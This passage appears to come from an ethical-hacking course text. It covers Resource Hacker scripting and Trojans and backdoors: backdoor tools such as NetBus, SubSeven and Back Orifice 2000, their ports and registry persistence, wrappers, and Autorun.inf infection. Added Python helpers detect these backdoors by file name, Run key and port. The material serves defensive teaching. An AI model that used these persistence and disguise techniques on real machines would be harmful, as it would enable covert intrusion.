5. Don't forget to fill the Caption entry. You need to enter the Resource Name in Caption textbox, e.g. if you have added a Bitmap and set its Resource Name as 401, then give the same 401 in Caption textbox.
PS: For AVI Control ( SysAnimate32 ), you'll need to append # in Caption value, e.g if the AVI name is 144, then put #144 in Caption textbox.
6. At last click on OK button & then Compile the script.
7. If you want to change the position of the new control in dialog box, simply click on the control and drag it to your desired location or you can also use arrow keys to move it.
Using Scripts in Resource Hacker
We can also run Resource Hacker from the Command Prompt and use scripts to automate lots of repetitive tasks to save time.
You can use scripts in 2 ways:
- Single Command
- Multiple Commands
[Single Command]
You can use the following commands in the Command Prompt to perform actions using Resource Hacker:
-add ExeFileName, ResultingFileName, ResourceAddress, ResourceType, ResourceName,
-addskip ExeFileName, ResultingFileName, ResourceAddress, ResourceType, ResourceName,
-addoverwrite ExeFileName, ResultingFileName, ResourceAddress, ResourceType, ResourceName,
-modify ExeFileName, ResultingFileName, ResourceAddress, ResourceType, ResourceName,
-extract ExeFileName, ResourceAddress, ResourceType, ResourceName,
-delete ExeFileName, ResultingFileName, ResourceType, ResourceName,
Where:
- ExeFileName - Source file name
- ResultingFileName - Output file name
- ResourceAddress - Resource location (e.g. the path of a Bitmap stored on your hard disk)
- ResourceType - Resource type (e.g. Bitmap, AVI, etc.)
- ResourceName - Resource name (e.g. 131, 1020, etc.)
Example:
ResHacker.exe -addoverwrite explorer.exe, explorer1.exe, MyImage.bmp, bitmap, 143,
[Multiple Commands]
You can also run a series of commands using a script. First you'll need to create the script file using Notepad, and then you can run it using the following command:
ResHacker.exe -script ScriptFileName
Where ScriptFileName is the name of the script file which you created in Notepad.
Following is the required format of the script file:
[FILENAMES]
Exe=
SaveAs=
Log=
[COMMANDS]
-addoverwrite ResourceAddress, ResourceType, ResourceName
Where:
- Exe= contains the source file name
- SaveAs= contains the output file name
- Log= contains the LOG file name which will store a detailed log of the operation
- The [COMMANDS] section contains the command-set which we want to perform on the source file.
PS: You can omit the Log= entry in the script file. In this case, Resource Hacker will automatically create a LOG file named "ResHacker.log".
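As an added example (not part of the original tutorial and not Resource Hacker's own code), the following Python helper writes the script format above from a list of operations and also emits the equivalent single-command lines, so the two modes can be compared side by side. It assumes that inside a script every command drops ExeFileName and ResultingFileName the way -addoverwrite does above, and that the trailing empty field in the page's example command stands for an unspecified resource language; both are assumptions, not something the tutorial states.

```python
# Added example, not Resource Hacker's own code: build a Resource Hacker script
# and the matching single-command invocations from one list of operations.
from typing import Iterable, List, Optional, Tuple

# One operation: (command, ResourceAddress, ResourceType, ResourceName, ResourceLanguage).
# ResourceAddress is the path of the file to add (empty for -delete). An empty
# language is assumed to be what the trailing comma in "... bitmap, 143," means.
Operation = Tuple[str, str, str, str, str]

SCRIPT_COMMANDS = {"-add", "-addskip", "-addoverwrite", "-modify", "-delete"}


def _arguments(op: Operation) -> str:
    """Arguments after the file names, in Resource Hacker's order.

    Assumption: inside a script every command omits ExeFileName and
    ResultingFileName just as -addoverwrite does in the tutorial.
    """
    cmd, address, rtype, rname, lang = op
    if cmd not in SCRIPT_COMMANDS:
        raise ValueError(f"unsupported command for scripts: {cmd}")
    fields = [rtype, rname, lang] if cmd == "-delete" else [address, rtype, rname, lang]
    return ", ".join(fields).rstrip()  # empty language leaves "..., 143,"


def build_script(exe: str, save_as: str, ops: Iterable[Operation],
                 log: Optional[str] = None) -> str:
    """Text of a script file to run with: ResHacker.exe -script <file>."""
    lines = ["[FILENAMES]", f"Exe={exe}", f"SaveAs={save_as}"]
    if log is not None:  # Log= is optional; without it Resource Hacker writes ResHacker.log
        lines.append(f"Log={log}")
    lines.append("[COMMANDS]")
    lines.extend(f"{op[0]} {_arguments(op)}" for op in ops)
    return "\n".join(lines) + "\n"


def single_commands(exe: str, save_as: str, ops: Iterable[Operation]) -> List[str]:
    """The same operations as one Command Prompt invocation each."""
    return [f"ResHacker.exe {op[0]} {exe}, {save_as}, {_arguments(op)}" for op in ops]


# Constructed sample: overwrite bitmap 143 (the tutorial's own example) and delete AVI 144.
SAMPLE_OPS: List[Operation] = [
    ("-addoverwrite", "MyImage.bmp", "bitmap", "143", ""),
    ("-delete", "", "AVI", "144", "1033"),
]

if __name__ == "__main__":
    print(build_script("explorer.exe", "explorer1.exe", SAMPLE_OPS, log="explorer.log"))
    print("\n".join(single_commands("explorer.exe", "explorer1.exe", SAMPLE_OPS)))
```

Write the returned text to a file with Notepad-style line endings if you want to hand it to ResHacker.exe -script; the single-command list is handy for pasting into a batch file instead.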
Trojans and Backdoors
A Trojan horse is:
- An unauthorized program contained within a legitimate program. This unauthorized program performs functions unknown (and probably unwanted) by the user.
- A legitimate program that has been altered by the placement of unauthorized code within it; this code performs functions unknown (and probably unwanted) by the user.
- Any program that appears to perform a desirable and necessary function but that (because of unauthorized code within it that is unknown to the user) performs functions unknown (and definitely unwanted) by the user.
Trojan horses can do anything that the user who executes the program on the remote machine can. This includes deleting files, transmitting to the intruder any files that can be read, changing any files that can be modified, installing other programs (such as programs that provide unauthorized network access) and executing privilege-elevation attacks; that is, the Trojan horse can attempt to exploit a vulnerability to increase its level of access beyond that of the user running it. If this is successful, the Trojan horse can operate with the increased privileges and go about installing other malicious code.
If the user has administrative access to the operating system, the Trojan horse can do anything that an administrator can.
A compromise of any system on a network may have consequences for the other systems on the network. Particularly vulnerable are systems that transmit authentication material, such as passwords, over shared networks in clear text or in a trivially encrypted form, which is very common.
If a system on such a network is compromised via a Trojan (or another method), the intruder may be able to record usernames and passwords or other sensitive information as it navigates the network.
Additionally, a Trojan, depending on the actions it performs, may falsely implicate the remote system as the source of an attack by spoofing and thereby cause the remote system to incur liability.
Trojans and Backdoors: Working of Trojans
- The attacker gets access to the trojaned system as soon as the system goes online.
- By way of the access provided by the Trojan, the attacker can stage attacks of different types.
Trojans work similar to the client-server model. Trojans come in two parts, a Client part and a Server part. The attacker deploys the Client to connect to the Server, which runs on the remote machine when the remote user (unknowingly) executes the Trojan on the machine. The typical protocol used by most Trojans is the TCP/IP protocol, but some functions of the Trojans may make use of the UDP protocol as well.
When the Server is activated on the remote computer, it will usually try to remain in a stealth mode, or hidden on the computer. This is configurable - for example in the Back Orifice Trojan, the server can be configured to remain in stealth mode and hide its process. Once activated, the server starts listening on default or configured ports for incoming connections from the attacker. It is usual for Trojans to also modify the registry and/or use some other auto starting method.
To exploit a Trojan, attackers need to ascertain the remote IP address to connect to the machine. Many Trojans have configurable features like mailing the victim's IP, as well as messaging the attacker via ICQ or IRC. This is relevant when the remote machine is on a network with dynamically assigned IP address or when the remote machine uses a dial-up connection to connect to the Internet. DSL users on the other hand, have static IPs so the infected IP is always known to the attacker.
Most Trojans use auto-starting methods so that the servers are restarted every time the remote machine reboots or starts; this is also notified to the attacker. As these features are countered, new auto-starting methods keep evolving. The start-up methods range from associating the Trojan with some common executable file such as explorer.exe to the known methods of modifying system files or the Windows Registry. Some of the popular locations targeted by Trojans are the Autostart folder, Win.ini, System.ini, Wininit.ini, Winstart.bat, Autoexec.bat and Config.sys; any of these can be used as an auto-starting method for Trojans.
Trojans and Backdoors: Various Trojans
- Remote Access Trojans
- Password Sending Trojans
- Keyloggers
- Destructive
- Denial Of Service (DoS) Attack Trojans
- Proxy/Wingate Trojans
- FTP Trojans
- Software Detection Killers
■ Remote Access Trojans
These are the Trojans usually referred to in the media, and hence they gain high visibility, because of their ability to give the attacker the power to do more things on the victim's machine than the victim has while sitting in front of it. Most of these Trojans are a combination of the other variations discussed below.
■ Password Sending Trojans
These Trojans are directed towards extracting all the cached passwords; they also capture other passwords entered by the victim and email them to an attacker-specified mail address, without the victim realizing it. The password harvest may include passwords for ICQ, IRC, FTP, HTTP or any other application that requires a user to enter a login and password. Most of them do not restart when Windows is loaded, as the objective is to gather as much information about the victim's machine as possible (passwords, mIRC logs, ICQ conversations) and mail it to the attacker.
■ Keyloggers
These Trojans log the keystrokes of the victim and then let the attacker search for passwords or other sensitive data in the log file. They usually come with two functions such as online and offline recording. As with the previous group, these Trojans can be configured to send the log file to a specific e-mail address on a regular basis.
■ Destructive
The only function of these Trojans is to destroy and delete files. They can deliberately delete core system files (for example: .dll, .ini or .exe files, possibly others) on the target machine. The Trojan is activated by the attacker or sometimes works like a logic bomb and starts on a specific day and at specific hour.
■ Denial of Service (DoS) Attack Trojans
These Trojans are used by attackers to issue a denial of service. A distributed denial of service may also be issued if the attacker has gathered enough victims. WinTrinoo is a DDoS tool that has become popular recently, and if the attacker has infected many ADSL users, major Internet sites could be shut down as a result.
Another variation of a DoS Trojan is the mail-bomb Trojan, whose main aim is to infect as many machines as possible and simultaneously attack specific e-mail address/addresses with random subjects and contents which cannot be filtered.
■ Proxy/Wingate Trojans
Underground sites are known to announce freely available proxy servers. These Trojans turn the victim's computer into a proxy/Wingate server available to the whole world or to the attacker only. It is used for anonymous Telnet, ICQ, IRC, etc., and also to register domains with stolen credit cards and for other illegal activities. This gives the attacker complete anonymity and the chance to do everything and point the trail to the victim.
■ FTP Trojans
These Trojans open port 21 (the port for FTP transfers) and let anybody, or just the attacker, connect to the machine. They may be password protected so that only the attacker is able to connect to the computer.
■ Software Detection Killers
There are such functionalities built into some Trojans, but there are also separate programs that will kill Zone Alarm, Norton Anti-Virus and many other popular anti-virus/firewall programs that protect the target machine. When they are disabled, the attacker has full access to the machine to perform some illegal activity or to use the computer to attack others, and often disappears afterwards.
Trojans and Backdoors: Modes of Transmission
- ICQ
- IRC
- Attachments
- Physical Access
- Browser and E-mail Software Bugs
- NetBIOS (File Sharing)
- Fake Programs
- Un-trusted Sites and Freeware Software
ICQ
People can also get infected while chatting / talking / video messaging over ICQ or any other Instant Messenger application. Receiving files is a risk the user undertakes no matter whom or where they come from.
IRC
Here also, the threat comes from the exchange of files, no matter what they claim to be or where they come from. It is possible that some of these are infected or disguised files.
Attachments
Any attachment, even if it is from a known source, should be screened, as it is possible that the source was infected earlier and is not aware of it.
Physical Access
Physical access to a target machine is perhaps the easiest way for an attacker to infect a machine. The motive may be a prank or just plain curiosity.
Browser and E-mail Software Bugs
Having outdated applications can expose the system to malicious programs such as Trojans without any other action on behalf of the attacker.
NetBIOS (File Sharing)
If port 139 is open, the attacker can install a Trojan .exe and modify some system file so that it runs the next time the system is rebooted. To block file sharing in Windows, go to: Start->Settings->Control Panel->Network->File and Print Sharing and uncheck the boxes there.
Tools and Software for Trojans and Backdoors
Tool: QAZ
- It is a companion virus that can spread over the network.
- It also has a "backdoor" that will enable a remote user to connect to and control the computer using port 7597.
- It may have originally been sent out by email.
- It renames Notepad to note.com.
- It modifies the registry key:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Hacking Tool: Tini
It is a very tiny Trojan program which is only 3 KB and programmed in assembly language. It takes minimal bandwidth to get onto the victim's computer and takes little disk space.
Tini only listens on port 7777 and runs a command prompt when someone attaches to this port. The port number is fixed and cannot be customized. This makes it easier to detect on a victim system, by scanning for port 7777.
From a Tini client you can telnet to the Tini server at port 7777.
Tool: Netcat
- Outbound or inbound connections, TCP or UDP, to or from any ports
- Ability to use any local source port
- Ability to use any locally-configured network source address
- Built-in port-scanning capabilities, with randomizer
- Built-in loose source-routing capability
Tool: Donald Dick
Donald Dick is a tool that enables a user to control another computer over a network.
It uses a client-server architecture with the server residing on the victim's computer.
The attacker uses the client to send commands through TCP or SPX to the victim, which listens on a pre-defined port.
Donald Dick uses the default port 23476 or 23477.
Tool: SubSeven
- SubSeven is a backdoor program that enables others to gain full access to Windows 9x systems through a network connection.
- The program consists of three different components: Client (SubSeven.exe), Server (Server.exe) and a Server configuration utility (EditServer.exe).
- The client is a GUI used to connect to the server through a network or Internet connection.
Since its debut in February 1999, SubSeven has become a favorite tool of intruders targeting Windows machines.
It is a RAT (Remote Administration Tool) that provides more options for attack than other Trojans like Back Orifice or NetBus. The SubSeven Trojan consists of three programs: the SubSeven server, client and server editor. It has DDoS potential and, like other Trojans, SubSeven can be used as a perfectly benign remote administration program.
The server must be run on the target computer to allow the attacker's computer to connect to the machine and have total access to it. The server editor (EditServer Program) helps configure the infection characteristics. This allows the hacker to specify whether the compromised system should send an email or ICQ notification to the attacker when the target is online, whether the program should "melt server after installation" and which ports the attacker can use to connect to the server. Once installed, SubSeven's friendly user-interface allows the attacker to easily monitor a victim's keystrokes, watch a computer's web cam, take screen shots, eavesdrop through the computer's microphone, control the mouse pointer, read and write files, and sniff traffic off the victim's local network.
Tool: Back Orifice 2000
Back Orifice accounts for the highest number of infestations on Microsoft computers.
The BO2K server code is only 100KB. The client program is 500KB.
Once installed on a victim PC or server machine, BO2K gives the attacker complete control of the system.
BO2K has stealth capabilities: it will not show up in the task list and runs completely hidden.
BO2K was written by DilDog of the Cult of the Dead Cow. Many of the commands that BO2K comes with were directly ported from Sir Dystic's original Back Orifice source code. The document says that it was written with a two-fold purpose: "To enhance the Windows operating system's remote administration capability and to point out that Windows was not designed with security in mind."
BO2K is an almost complete rewrite of the original Back Orifice. By default, BO2K comes with the capability to talk over TCP as well as UDP, and supports strong encryption through plug-ins. It has added functionality in the areas of file transfer and registry handling. It has hacking features, such as dumping certain cached passwords. It can be configured to be stealthy.
Like other Trojans, Back Orifice is a client/server application which allows the client software to monitor, administer, and perform other network and multimedia actions on the machine running the server. To communicate with the server, either the text-based or the GUI client can be run on any Microsoft Windows machine.
The BO2K server installed without any plugins is ~100K and leaves a small footprint. The client software is ~500K. The whole suite will fit on a single 1.44MB floppy disk. BO2K 1.0 will currently run on Windows 95, Windows 98, Windows ME, Windows NT, Windows 2000, and Windows XP systems. All of the various parts of the BO2K suite have been tested and found to be working on all of these platforms. It only runs on Intel platforms at the moment.
Back Orifice Plug-ins
- BO2K functionality can be extended using BO plug-ins.
- BOPeep (Complete remote control snap-in)
- Encryption (Encrypts the data sent between the BO2K GUI and the server)
- BOSOCK32 (Provides stealth capabilities by using ICMP instead of TCP/UDP)
- STCPIO (Provides encrypted flow control between the GUI and the server, making the traffic more difficult to detect on the network)
BO Peep - This plugin gives you streaming video of the screen of the machine the server is running on. It also provides remote keyboard and mouse access.
Serpent Encryption - This is a very fast implementation of the non-export-restricted 256-bit SERPENT encryption algorithm.
CAST-256 Encryption - This internationally available plugin provides strong encryption using the CAST-256 algorithm.
IDEA Encrypt - This internationally available plugin provides strong encryption using the IDEA algorithm. 128-bit encryption.
RC6 Encryption - This internationally available plugin provides strong encryption using the RC6 algorithm. Provides 384-bit encryption.
STCPIO - TCPIO communications plugin with an encrypted flow control system to make BO2K TCP traffic virtually impossible to detect.
Rattler notifies a specified user as to the whereabouts of a Back Orifice 2000 server via e-mail. Rattler will send an e-mail each time it detects an IP address addition/modification.
rICQ is a plugin for Back Orifice 2000 that operates in a similar fashion to Rattler, except that the notification message is sent via ICQ's web pager service.
The Butt Trumpet 2000 plugin for BO2K, once installed and started, sends you an email with the host's IP address. A nice alternative to Rattler.
BoTool provides a graphical file browser and registry editor to the BO2K interface. It makes common tedious BO2K tasks point-and-click simple.
Tool: NetBus
NetBus was written by a Swedish programmer, Carl-Fredrik Neikter, in March 1998. Version 1.5 in English appeared in April. NetBus apparently received little media attention, but it was in fairly wide use by the time BO was released on 3 August.
NetBus consists of two parts: a client program ("netbus.exe") and a server program, often named "patch.exe" (or "SysEdit.exe" with version 1.5x), which is the actual backdoor. Version 1.60 uses TCP/UDP port 12345, which can't be altered; from version 1.70 onwards the port can be configured. If it is installed by a "game" called "whackamole" (file name "whackjob.zip", which contains the NetBus 1.53 server), the server is named "explore.exe". There is also a file called whackjob17.zip, which installs the server of NetBus 1.70, uses port 12631 and is additionally password protected (password: "ecoli"). The NetBus server is installed by "game.exe" during the setup routine; the server itself is "explore.exe", located in the Windows directory.
To start the server automatically, there is an entry in the registry at "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", normally used with the option "/nomsg". If this entry is deleted, the server won't be started with Windows.
The NetBus server is about 4 times as large as the Back Orifice server, and generally less "stealthy." Unlike BO, NetBus is not designed to attach virus-like to legitimate files or applications.
Like BO, the NetBus server can have practically any filename. The usual way it is installed is through simple deception; the program is sent to the victim, or offered on a website, and falsely represented as something it is not. Occasionally it may be included in a setup package for a legitimate application and executed in the process of that setup.
The unsuspecting victim runs the program either directly or by way of the application used as camouflage, and it immediately installs itself and begins to offer access to intruders.
NetBus will always reveal its presence by way of an open port, viewable with netstat.exe. Because of this, many intruders delete netstat.exe from the victim's hard drive immediately upon gaining access. Creating a copy or two of netstat using other names is a good precaution against its loss. A regular check for the presence of netstat.exe, including the file's size and date, is advisable and is one means of spotting intrusions. Attackers may use BO as a means of installing Netbus on the target system. This is because NetBus is sophisticated yet easy to use.
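The advice above to keep an eye on the presence, size and date of netstat.exe can be turned into a baseline check. The following Python is an added example, not from the original text: it records the size and SHA-256 of a file and later reports whether that file is unchanged, modified or missing. The demo works on a constructed stand-in file in a temporary directory rather than the real system binary, and the file name and contents are placeholders.

```python
# Added example, not from the original text: baseline a file's size and hash and
# report later whether it is still intact (the page suggests doing this for netstat.exe).
import hashlib
import os
import tempfile
from typing import Dict, List, Optional


def fingerprint(path: str) -> Optional[Dict[str, object]]:
    """Size, modification time and SHA-256 of a file, or None if it is missing."""
    if not os.path.isfile(path):
        return None
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    info = os.stat(path)
    return {"size": info.st_size, "mtime": int(info.st_mtime), "sha256": digest.hexdigest()}


def check_file(path: str, baseline: Dict[str, object]) -> str:
    """'ok', 'modified' or 'missing' compared with a fingerprint taken earlier.

    Size is compared alongside the hash so a report can say what changed;
    mtime is recorded but not trusted, because timestamps are trivial to reset.
    """
    current = fingerprint(path)
    if current is None:
        return "missing"
    if current["sha256"] != baseline["sha256"] or current["size"] != baseline["size"]:
        return "modified"
    return "ok"


def demo() -> List[str]:
    """Walk through the three outcomes on a constructed stand-in for netstat.exe."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "netstat.exe")  # stand-in, not the real %windir%\system32 binary
        with open(path, "wb") as handle:
            handle.write(b"MZ" + b"\x00" * 64)  # constructed bytes, not a real executable
        baseline = fingerprint(path)
        results = [check_file(path, baseline)]  # untouched -> "ok"
        with open(path, "ab") as handle:
            handle.write(b"\x90")  # tampered -> "modified"
        results.append(check_file(path, baseline))
        os.remove(path)  # deleted, as the page says intruders do -> "missing"
        results.append(check_file(path, baseline))
    return results


if __name__ == "__main__":
    print(demo())
```

In practice the baseline dictionary should be stored somewhere the intruder cannot reach from the monitored host (removable media or another machine), since a baseline kept next to the file can be rewritten together with it.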
Once access is gained, the intruder will often install other backdoors, FTP or HTTP daemons which open the victim's drive(s) to access, or he may enable resource sharing on the Net connection.
The v1.53 server opens two TCP ports numbered 12345 and 12346. It listens on 12345 for a remote client and apparently responds via 12346. It will respond to a Telnet connection on port 12345 with its name and version number.
NetBus v1.53 is not extremely stealthy, but it is certainly functional and effective.
This utility also has the ability to scan "Class C" addresses by adding "+Number of ports" to the end of the target address. Example: 255.255.255.1+254 will scan 255.255.255.1 through 255.255.255.255.
By default, the v1.60 server is named Patch.exe. It may be renamed. Its size is 461K (472,576 bytes). When this program is run, it remains where it is and nothing appears to happen. Unlike v1.53, it can then be deleted uneventfully. However, it is functional. It copies itself to the Windows directory, extracts from within itself a file called KeyHook.dll and activates both programs.
Run without added parameters, v1.60 is persistent; that is, it will execute on its own when the computer is restarted. It makes changes to the Registry; it creates the key
HKEY_CURRENT_USER\PATCH, where PATCH is the filename without the extension; and by default, it places a value in the key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Version 1.60, like v1.53, also creates the Registry keys
HKEY_CURRENT_USER\NETBUS and HKEY_CURRENT_USER\NETBUS\Settings and places basically the same series of values in the Settings key.
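The Run key entries described for QAZ and NetBus (note.com, explore.exe, Patch.exe started with /nomsg) can be audited from a `reg export` of the Run keys. The following Python is an added example, not part of the original text: it parses .reg text and flags Run values that match the server names and switches this page gives. The sample export is constructed, the value names in it are placeholders, and the pattern list contains only names taken from this page, so it is a starting point rather than a complete list.

```python
# Added example, not from the original text: audit Run keys from `reg export`
# output for the auto-start entries this page attributes to QAZ and NetBus.
import re
from typing import Dict, List, Tuple

# Run keys the page names as Trojan auto-start locations (registry paths are case-insensitive)
RUN_KEYS = {
    r"hkey_local_machine\software\microsoft\windows\currentversion\run",
    r"hkey_current_user\software\microsoft\windows\currentversion\run",
}
# File names and switches taken from this page only
SUSPICIOUS = [re.compile(p, re.IGNORECASE) for p in (
    r"\bnote\.com\b",      # QAZ renames Notepad to note.com
    r"\bexplore\.exe\b",   # NetBus server dropped by whackjob.zip (not explorer.exe)
    r"\bpatch\.exe\b",     # NetBus 1.60/1.70 default server name
    r"\bsysedit\.exe\b",   # NetBus 1.5x server name
    r"/nomsg\b",           # switch NetBus uses in its Run entry
)]

_VALUE_LINE = re.compile(r'^(@|"(?:[^"\\]|\\.)*")=(.*)$')


def _unquote(text: str) -> str:
    """Strip the quotes of a .reg string and undo its backslash escaping."""
    if text.startswith('"') and text.endswith('"'):
        text = text[1:-1]
    return text.replace('\\"', '"').replace("\\\\", "\\")


def parse_reg_export(text: str) -> Dict[str, Dict[str, str]]:
    """Parse `reg export` (.reg) text into {key path: {value name: string data}}."""
    keys: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
            continue
        match = _VALUE_LINE.match(line)
        if current is None or not match:
            continue  # hex continuation lines are not needed for Run entries
        name = "@" if match.group(1) == "@" else _unquote(match.group(1))
        keys[current][name] = _unquote(match.group(2))
    return keys


def audit_run_keys(text: str) -> List[Tuple[str, str, str, str]]:
    """(key, value name, command line, matched pattern) for Run entries worth a look."""
    findings = []
    for key, values in parse_reg_export(text).items():
        if key.lower() not in RUN_KEYS:
            continue
        for name, command in values.items():
            for pattern in SUSPICIOUS:
                if pattern.search(command):
                    findings.append((key, name, command, pattern.pattern))
                    break
    return findings


# Constructed sample export (no real machine data); backslashes are doubled as in .reg files
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SoundMixer"="C:\\WINDOWS\\system32\\mixer.exe /tray"
"Patch"="C:\\WINDOWS\\Patch.exe /nomsg"
"StartIE"="C:\\WINDOWS\\note.com"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"Updater"="C:\\Program Files\\Vendor\\update.exe"
'''

if __name__ == "__main__":
    for key, name, command, why in audit_run_keys(SAMPLE_REG):
        print(f"{key}\\{name}: {command}  (matched {why})")
```

Name matching is deliberately the weak part of this check: the page itself notes that both servers may be renamed, so a clean result here says nothing about a renamed server, and every Run entry that points outside the usual program directories still deserves a manual look.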
The v1.60 server opens two TCP ports numbered 12345 and 12346. It listens on 12345 for a remote client and apparently responds via 12346. It will respond to a Telnet connection on port 12345 with its name and version number.
Among the new features are greatly expanded file-handling capabilities, an interactive message dialog, password setting and other server controls, and new ways to tamper with the keyboard. Most of its tricks are evident from this console display.
NetBus 1.7 was released to the public on 11/14/98. It is basically the same program as version 1.6, but with an ultra-fast port scanner, the capability of redirecting data to another host and port, an option to configure the server exe with settings such as the TCP port and mail notification, the ability to redirect I/O from console applications to a specified TCP port, and the restriction of access to only a few IP numbers.
By default, the v1.70 server is named Patch.exe. It may be renamed. Its default size is 483K (494,592 bytes). With configuration added, its size increases, usually by a couple of hundred bytes. By default, the v1.70 server opens two TCP ports numbered 12345 and 12346. It listens on 12345 for a remote client and apparently responds via 12346. It will respond to a Telnet connection on port 12345 with its name and version number. It can however be readily configured to use any other virtual port from 1 to 65534. The port configuration can be pre-set by the sender, and/or it can be changed from remote. It will also open the next-numbered port in sequence, which it apparently uses for responses to the client.
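Several of the tools above announce themselves through a fixed listening port (QAZ on 7597, Tini on 7777, NetBus on 12345/12346 or 12631, Donald Dick on 23476/23477), and the page notes that NetBus shows up in netstat output. The following Python is an added example, not from the original text: it parses the table printed by netstat -an and reports listening TCP ports that appear on this page's list, including 139 for exposed file sharing and 21 for an FTP service. The netstat output is constructed; its outbound connection to a remote port 7777 is deliberately not flagged, because only local listeners are of interest here.

```python
# Added example, not from the original text: parse `netstat -an` output and report
# listening TCP ports that this page associates with particular tools or exposures.
from typing import Dict, List, Tuple

# Ports taken from this page only
KNOWN_PORTS: Dict[int, str] = {
    21: "FTP service (FTP Trojan or a real server; check which)",
    139: "NetBIOS file sharing reachable (Trojan drop path via shares)",
    7597: "QAZ backdoor",
    7777: "Tini (fixed port)",
    12345: "NetBus command port",
    12346: "NetBus response port",
    12631: "NetBus 1.70 whackjob17 variant",
    23476: "Donald Dick default port",
    23477: "Donald Dick default port",
}

Socket = Tuple[str, str, int, str]  # (proto, local address, local port, state)


def parse_netstat(text: str) -> List[Socket]:
    """Parse the table printed by `netstat -an` on Windows; header lines are ignored."""
    sockets: List[Socket] = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 3 or parts[0] not in ("TCP", "UDP"):
            continue
        address, _, port = parts[1].rpartition(":")  # rpartition also copes with [::]:135
        if not port.isdigit():
            continue
        state = parts[3] if parts[0] == "TCP" and len(parts) > 3 else ""
        sockets.append((parts[0], address, int(port), state))
    return sockets


def flag_listeners(text: str) -> List[Tuple[int, str]]:
    """Listening TCP ports that appear in KNOWN_PORTS, in ascending order."""
    hits: Dict[int, str] = {}
    for proto, _address, port, state in parse_netstat(text):
        if proto == "TCP" and state == "LISTENING" and port in KNOWN_PORTS:
            hits[port] = KNOWN_PORTS[port]
    return sorted(hits.items())


# Constructed sample output, not captured from a real host
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:139            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:12345          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:12346          0.0.0.0:0              LISTENING
  TCP    192.168.1.10:1044      203.0.113.5:80         ESTABLISHED
  TCP    192.168.1.10:1052      203.0.113.9:7777       ESTABLISHED
  UDP    0.0.0.0:137            *:*
"""

if __name__ == "__main__":
    for port, what in flag_listeners(SAMPLE_NETSTAT):
        print(f"port {port}: {what}")
```

Run it against output saved from the host under review rather than on the host itself where possible: the page's point that intruders delete netstat.exe applies equally to any script that depends on it, and NetBus 1.70 can be moved to an arbitrary port, so an empty result only rules out the default configurations.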
"NetBus 2.0 Pro" (often just called "NetBus 2.0"), the latest version of this well-known backdoor program, has been released after Spector took over NetBus. Therefore the new version is shareware and needs the remote user's permission for installation. However, hackers have released variations such as Retail_10.exe, which fakes the incomplete patch of ICQ. Instead it installs the "NetBus 2.0 Server" in invisible and auto-starting mode. It even deletes the data logged by the server.
Trojans and Backdoors: Wrappers
- How does an attacker get BO2K or any Trojan installed on the victim's computer? Answer: using wrappers.
- A wrapper attaches a given EXE application (such as a game or office application) to the BO2K executable.
- The two programs are wrapped together into a single file. When the user runs the wrapped EXE, it first installs BO2K and then runs the wrapped application.
- The user only sees the latter application.
Wrappers are used to bind the Trojan executable with a legitimate file. The attacker can compress any (DOS/WIN) binary with tools like "petite.exe". This tool decompresses an exe-file (once compressed) at runtime. This makes it possible for the Trojan to get in virtually undetected, as most antivirus products are not able to detect the signatures in the file.
The attacker can also pack several executables into one executable. These wrappers may also support functions like running one file in the background while another one is running on the desktop.
Technically speaking though, wrappers can be considered another type of software "glueware" that is used to attach other software components together. A wrapper encapsulates a single data source to make it usable in a more convenient fashion than the original unwrapped source.
Users can be tricked into installing Trojan horses by being enticed or frightened. For example, a Trojan horse might arrive in email described as a computer game. When the user receives the mail, they may be enticed by the description of the game to install it. Although it may in fact be a game, it may also be taking other action that is not readily apparent to the user, such as deleting files or mailing sensitive information to the attacker.
Graffiti.exe is an example of a legitimate file that can be used to drop the Trojan onto the target system. This program runs as soon as Windows boots up and, on execution, keeps the user distracted for a given period of time by running on the desktop.
Tool: EliteWrap
Ø Elite Wrap is an advanced EXE wrapper for Windows 95/98/2K/NT used for SFX archiving and secretly installing and running programs.
Ø With EliteWrap one can create a setup program that would extract files to a directory and execute programs or batch files to display help, copy files, etc.
Icon Plus is a conversion program for translating icons between various formats. Icon Plus can now read and save Windows XP icons, and it can also be operated from the command prompt. This kind of application can be used by an attacker to disguise his malicious code or Trojan so that users are tricked into executing it.
There are numerous icon libraries available on the Internet that allow a user to change icons to suit various operating systems by mimicking their look and feel.
Tool: Restorator
It is a versatile skin editor for any Win32 program: change images, icons, text, sounds, videos, dialogs, menus, and other parts of the user interface. Using this, one can create one's own User-styled Custom Applications (UCA).
The relevance of discussing this tool here arises from its ability to modify the user interface of any Windows 32-bit program and thus create UCAs. The user can view, extract, and change images, icons, text, dialogs, sounds, videos, menus and much more.
Infecting via CD-ROM
Ø When you place a CD in your CD-ROM drive, it automatically starts a setup interface. An Autorun.inf file placed on such CDs is responsible for this action, and it looks like this:
[autorun]
open=setup.exe
icon=setup.exe
Ø Therefore it is quite possible that while running the real setup program a trojan could be run very easily.
Ø Turn off the Auto-Start functionality by doing the following:
Start button-> Settings-> Control Panel-> System-> Device Manager-> CDROM-> Properties -> Settings
The Autorun.inf file that is placed on such CDs can be configured to execute the Trojan. This makes it possible to infect a machine while running the real setup program. It looks like this:
[autorun]
Open= setup.exe
Icon= setup.exe
The countermeasure is to disable the auto-start functionality by doing the following:
Start Button-> Settings-> Control Panel-> System-> Device Manager-> CDROM-> Properties-> Settings
Uncheck Auto Insert Notification.
